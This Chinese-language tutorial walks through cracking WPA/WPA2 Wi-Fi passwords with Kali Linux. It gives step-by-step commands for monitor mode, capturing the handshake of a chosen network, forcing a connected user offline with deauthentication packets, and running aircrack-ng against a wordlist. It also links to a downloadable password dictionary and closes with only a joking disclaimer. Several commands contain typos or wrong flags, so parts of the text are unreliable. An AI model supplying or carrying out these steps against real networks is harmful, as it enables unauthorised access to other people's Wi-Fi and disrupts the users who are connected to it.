使用kali破解wifi密碼的方式
目錄
- 前期準備
- kali官網
- 正式開始
- 開啟網卡監控
- 掃描wifi
- 等待抓取握手包
- 爆破 抓取握手包
- 抓取成功
- 開始破解
- 溫馨提示
今天教大家如何用kali破解WPA/WPA2加密方式的密碼
前期準備
- 支持監聽的網卡一張(大概20多塊錢,不貴)
- 以及安裝kali的VMware
kali官網
kali是什么? 就是一個專門用于滲透行業的Linux發行版本,里面的工具非常豐富,本文就是建立在kali系統的支持之上的
https://www.kali.org/get-kali/#kali-virtual-machines下載位置下載了vm文件后可以直接用VMware打開,開機后
用戶名:kali
密碼:kali
正式開始
查看已安裝網卡
以下的操作都需要提升權限,默認的root密碼都是kali
#提升權限sudo su
#查看網卡airmon-ng
如果沒有,請注意是否開啟了網卡在虛擬機的連接,如下圖
打開一個終端窗口
開啟網卡監控
#開啟網卡監控airmon-ng start wlan0
可以使用命令看看網卡的名字是否改變
ifconfig
可以看到最后的那個名字已經改變
掃描wifi
airodump-ng wlan0mon
我們選擇這個名叫adcd的wifi進行破解
等待抓取握手包
上述方法后,按ctrl+c,退出掃描
輸入命令
airodump-ng -w freedom -c 11 --bssid 9C:2E:A1:20:65:BC wlan0mon -ignore-nefative-oneaa
-c:指定信道
-w:指定抓去握手包的存放位置或者名字,freedom是一會抓去的握手包的名字
–bssid:指定路由器的MAC
需要更改兩個參數,信道和地址,這兩個參數分別是掃描wifi時確定要破解的wifi參數
回車后,如下界面
從這個界面可以看出,選定的wifi一共有一個人連接,沒有人連接的wifi是無法破解的
爆破 抓取握手包
這個步驟,說白了,就是將一個用戶踢下線,讓他重新連接WIFI,這樣我們就能監聽并且截取到握手包
重啟一個終端窗口,一樣的,申請管理員權限,密碼默認:kali
sudo su
執行如下命令,同樣的,需要輸入上一步的兩個參數,一個客戶機的MAC,和路由器的MAC
aireplay-ng -0 2 -a 9C:2E:A1:20:65:BC -c A4:50:46:D8:74:29 wlan0mon
-a:指定路由器的MAC
-c:指定客戶機的MAC
執行成功后如上圖,表明該客戶機以及被成功的踢下線,我們要做的就是等待客戶機重新連接,他只要重新連接了,我們就能抓到握手包,進行跑字典破解
抓取成功
當第四步的終端窗口出現如下
表明成功抓取到握手包,進行下一個步驟
注意!!這里抓到包一定要按ctrl+c退出抓包,不然抓到的握手包用不了哦
開始破解
包在**/home/kali/**文件夾下,找到名叫freedom-01.ivs文件,這個就是抓到的包
然后就是字典,我個人建議將字典一同放在該目錄下
然后再次重起一個終端窗口,輸入如下命令
ircrack-ng -w pass.txt freedom-*.ivs
回車開始解密
能否成功看字典的是否強大,也看臉
成功界面
失敗界面
溫馨提示
kali學的好,牢飯少不了
本教程僅用于學習,請大家謹慎使用
需要字典的小伙伴可以不要私聊我啦,真的回復不過來了
需要的還是度盤自提吧:
鏈接: https://pan.baidu.com/s/1zL1hyHvF5DGsatPsp45L3g
提取碼: uq8t
到此這篇關于使用kali破解wifi密碼的文章就介紹到這了,更多相關kali破解密碼內容請搜索以前的文章或繼續瀏覽下面的相關文章,希望大家以后多多支持!